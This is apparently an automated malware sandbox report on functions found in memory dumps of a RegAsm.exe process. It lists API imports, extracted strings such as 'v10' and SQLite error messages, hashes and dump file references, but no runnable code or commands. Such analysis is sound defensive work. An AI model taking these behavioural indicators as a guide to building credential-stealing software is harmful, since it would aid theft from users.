Opcode ID: ccd5a00ca21eafa9a2e41cf581c937da5b32fd2b3baf2ff39e0f18c04cf3ad07
Instruction ID: 7e3ac9d3cfc473a6f3074d2b060040c3f31b32d79d2187fc746aec1c5e5b55ae
Opcode Fuzzy Hash: ccd5a00ca21eafa9a2e41cf581c937da5b32fd2b3baf2ff39e0f18c04cf3ad07
Instruction Fuzzy Hash: 2D213BB4608356AFE7119728C984FEBBBDDAFD4704F9C4C1DE5998A191C23598448393

Uniqueness

Uniqueness Score: -1.00%

Function 0040635E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00406363
memcmp.MSVCRT ref: 00406389
memset.MSVCRT ref: 004063B8
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

Part of subcall function 0040E35E: lstrlen.KERNEL32(?,00000000,?,00415304,004244B3,004244B2,00000000,00000000,?,00415CB7), ref: 0040E367
Part of subcall function 0040E35E: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E39B

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Strings

v10, xrefs: 00406381

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
String ID: v10
API String ID: 2733184300-1337588462
Opcode ID: 2465a5153b8ebb7219816266577d031178f9fabdb2e3b82eaf52d96ed69feb8f
Instruction ID: 3b815f35c8779159b4c6e66c181decb50fe3ad77cea2142db40f7166cb1a7ae3
Opcode Fuzzy Hash: 2465a5153b8ebb7219816266577d031178f9fabdb2e3b82eaf52d96ed69feb8f
Instruction Fuzzy Hash: 3D315E71900219ABCB00EFA5DC85EEE7B78EF40754F11853FF812B62C1D7789A25CA59

Uniqueness

Uniqueness Score: -1.00%

Function 198FEBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198FEC42
CREATE , xrefs: 198FEBFF
%s at line %d of [%.10s], xrefs: 198FEC51
database corruption, xrefs: 198FEC4C

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: 95416e13ca0744b280b97bd8c46f0197dc695f20e90385d69501c0765de8d153
Instruction ID: 9227cf06877dd09a477433d3c0e19cc4f427991e157c43a955c65835ce918ff9
Opcode Fuzzy Hash: 95416e13ca0744b280b97bd8c46f0197dc695f20e90385d69501c0765de8d153
Instruction Fuzzy Hash: E9315A625083C19AD7110E6DDC40BA27B91AF51A1AF1C50BEF8D98A1C3E326B584D771

Uniqueness

Uniqueness Score: -1.00%

Function 198D93A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198D9446, 198D948A
%s at line %d of [%.10s], xrefs: 198D9455, 198D9499
database corruption, xrefs: 198D9450, 198D9494

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: c3a385fd02cfa0b865b88a90d096ed4b7aaecb2fbc5484a5a6db228fbf9a2fc2
Instruction ID: f1615fc8a2cc5bd103071c54aca3382b14fd7f4a2c93b53f3ea78b1ddbb44ae7
Opcode Fuzzy Hash: c3a385fd02cfa0b865b88a90d096ed4b7aaecb2fbc5484a5a6db228fbf9a2fc2
Instruction Fuzzy Hash: FF316939640B904BC314DF28C890AB3BBF3AF85711B9C845CE5D64B786E323E846C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 19831C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19831D3C
misuse, xrefs: 19831D46
%s at line %d of [%.10s], xrefs: 19831D4B
unknown database: %s, xrefs: 19831CBD

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: b2b1db1aae64c007a0b0c92d43615ad276df544ccad0d36c8524f8b031a641d6
Instruction ID: fbae3961ba0bdaef6d15ded189d5d00cb20754e4f3c19a9f1facfc6364ff4d19
Opcode Fuzzy Hash: b2b1db1aae64c007a0b0c92d43615ad276df544ccad0d36c8524f8b031a641d6
Instruction Fuzzy Hash: 432147755007406BD7209A39DC80F9776B9BFD2B56F8C052CF85857281D771E606C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 19863FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1986407D, 198640A8
%s at line %d of [%.10s], xrefs: 1986408C, 198640B7
database corruption, xrefs: 19864087, 198640B2

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 3b99fe659864dfb008f49b3ea429ceb041c8b9b05fd91e94e7670ba7bfcdef27
Instruction ID: edb8e798e145eb068b623870ad84ba7b38c38ad3abfdc0e5048543d0f86d1ed9
Opcode Fuzzy Hash: 3b99fe659864dfb008f49b3ea429ceb041c8b9b05fd91e94e7670ba7bfcdef27
Instruction Fuzzy Hash: 5C21F4B76402215BC700DE1CDC405EB7BD0FB94A11F99442AFD84D7241E229D58987E2

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC78 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040DC7D
memcpy.MSVCRT ref: 0040DD1C

Strings

K@, xrefs: 0040DC87
K@, xrefs: 0040DD04, 0040DD17
K@, xrefs: 0040DD41

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologmemcpy
String ID: K@$K@$K@
API String ID: 2991061955-1546295686
Opcode ID: e3133dc068ce2456e00f429e53e50bbf90f9da3ed43d8ea12ccbb3485ad347e0
Instruction ID: 09f83a8a565cca207f9f4f14651987df85ea441a9bb6a010da389feee8c69957
Opcode Fuzzy Hash: e3133dc068ce2456e00f429e53e50bbf90f9da3ed43d8ea12ccbb3485ad347e0
Instruction Fuzzy Hash: AA218331F04205ABE724DF99D84176EBBB5EF94750F20452FE405AB3C1C7B4AA44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 198D9290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 198D929C, 198D932A
%s at line %d of [%.10s], xrefs: 198D92AB, 198D9339
database corruption, xrefs: 198D92A6, 198D9334

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: bedcbf4f6f6991a66ebedb2c6703b27e6cb14fbc385fb265b0d08879a9d881e5
Instruction ID: 264e9172112e90073a03eb7f227455f27bc4cb6295acd95cd1d6a611bd1212b1
Opcode Fuzzy Hash: bedcbf4f6f6991a66ebedb2c6703b27e6cb14fbc385fb265b0d08879a9d881e5
Instruction Fuzzy Hash: 2C214935144BA05BC321DF389C80AB3BBF2AF55700B9D995CE1D287796E222E485C790

Uniqueness

Uniqueness Score: -1.00%

Function 198433C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 198433D6

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: da79f256ab59c4ed502f1d5b9c67179b0805e2dc97838916c09f8a33222680a7
Instruction ID: db20e61dfd163589d7c56cc6450a16ffb16a13ce25bf877943bf30be6970818d
Opcode Fuzzy Hash: da79f256ab59c4ed502f1d5b9c67179b0805e2dc97838916c09f8a33222680a7
Instruction Fuzzy Hash: 1D01C0797002164BD601DF1DE800B8AB3E9AFD5311F59C16BF6008B280EBB0E58B8BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6BE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,0042444E), ref: 0040E6CC
HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6D3
GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,0042444E), ref: 0040E6DF
wsprintfA.USER32 ref: 0040E70A

Strings

NDB, xrefs: 0040E6E5, 0040E6E9

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID: NDB
API String ID: 1243822799-2307052389
Opcode ID: f4e31b41c4f837f3f9b6a05b65a51a9ce5930b8ebfcd67e28f82b396df0ccc0f
Instruction ID: 25b842971a62ea4220106e84a2e499dab2200740227a77a54e95fb6ecba8386c
Opcode Fuzzy Hash: f4e31b41c4f837f3f9b6a05b65a51a9ce5930b8ebfcd67e28f82b396df0ccc0f
Instruction Fuzzy Hash: FCF0FEA6900124BBCB50ABE9AC09ABF76FDEF0CB12F001042FA41E1090E7388A51D7B4

Uniqueness

Uniqueness Score: -1.00%

Function 19946A20 Relevance: 8.0, APIs: 5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85e8a741da4f6023129020bb1b4af472e37390f425639d4db5fa695f4f9be2d8
Instruction ID: 4a255dcd3bbc3c7e3808dc96e1cf451025275d8634512ca5db2ba96ac9f376b8
Opcode Fuzzy Hash: 85e8a741da4f6023129020bb1b4af472e37390f425639d4db5fa695f4f9be2d8
Instruction Fuzzy Hash: D3029CF0908756CFD702DF28DA84B1AB7E8BF44304F18492DE98987281E775E959CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 198AAF80 Relevance: 7.8, APIs: 5, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb3910e2342b6addf9fb5c0f43c4b40be6ad57c9277d1b0cf87785cd2fbc6964
Instruction ID: 45f40fe649d34042635d24fb5a7a019498404e87ba980409057cff694d640089
Opcode Fuzzy Hash: eb3910e2342b6addf9fb5c0f43c4b40be6ad57c9277d1b0cf87785cd2fbc6964
Instruction Fuzzy Hash: A0A17FB09016A1DFD7119F3DD888A1A377CBF10746B0A0429EC09D7291D735EA6ECBE6

Uniqueness

Uniqueness Score: -1.00%

Function 00418C31 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00418C3D

Part of subcall function 00418E14: __getptd_noexit.LIBCMT ref: 00418E17
Part of subcall function 00418E14: __amsg_exit.LIBCMT ref: 00418E24

__getptd.LIBCMT ref: 00418C54
__amsg_exit.LIBCMT ref: 00418C62
__lock.LIBCMT ref: 00418C72
__updatetlocinfoEx_nolock.LIBCMT ref: 00418C86

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 196a9b5a0ffbf0a07e74f70d4afe28d89454b2ba936b2bad243be07296f6c190
Instruction ID: 1c9dc4c2fd994eab8bb54244213b597f31c2b611719aefda59fbeadc66384906
Opcode Fuzzy Hash: 196a9b5a0ffbf0a07e74f70d4afe28d89454b2ba936b2bad243be07296f6c190
Instruction Fuzzy Hash: 15F06231A457109BD620BB655802BC937A0AF00728F11015FF540972C2DF6C59C1CAEE

Uniqueness

Uniqueness Score: -1.00%

Function 00407814 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 441stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00407819

Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314

lstrlen.KERNEL32(00000000), ref: 00407D68
lstrlen.KERNEL32(00000000), ref: 00407D7C

Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2

Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A

Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1

Part of subcall function 0040635E: _EH_prolog.MSVCRT ref: 00406363
Part of subcall function 0040635E: memcmp.MSVCRT ref: 00406389
Part of subcall function 0040635E: memset.MSVCRT ref: 004063B8
Part of subcall function 0040635E: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 004063ED

Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347

Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D

Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023

Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD

Strings

#, xrefs: 00407DAC

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$lstrcat$AllocCreateLocalObjectSingleThreadWaitmemcmpmemset
String ID: #
API String ID: 3207582090-1885708031
Opcode ID: b805d3b9565853708e99e7ae7d1bb92876f5adb27d2dc30a444658b3658ed647
Instruction ID: c0a52271d844bb62f607544ada46581858a80ab82f245f3e65b8284815ee8f7a
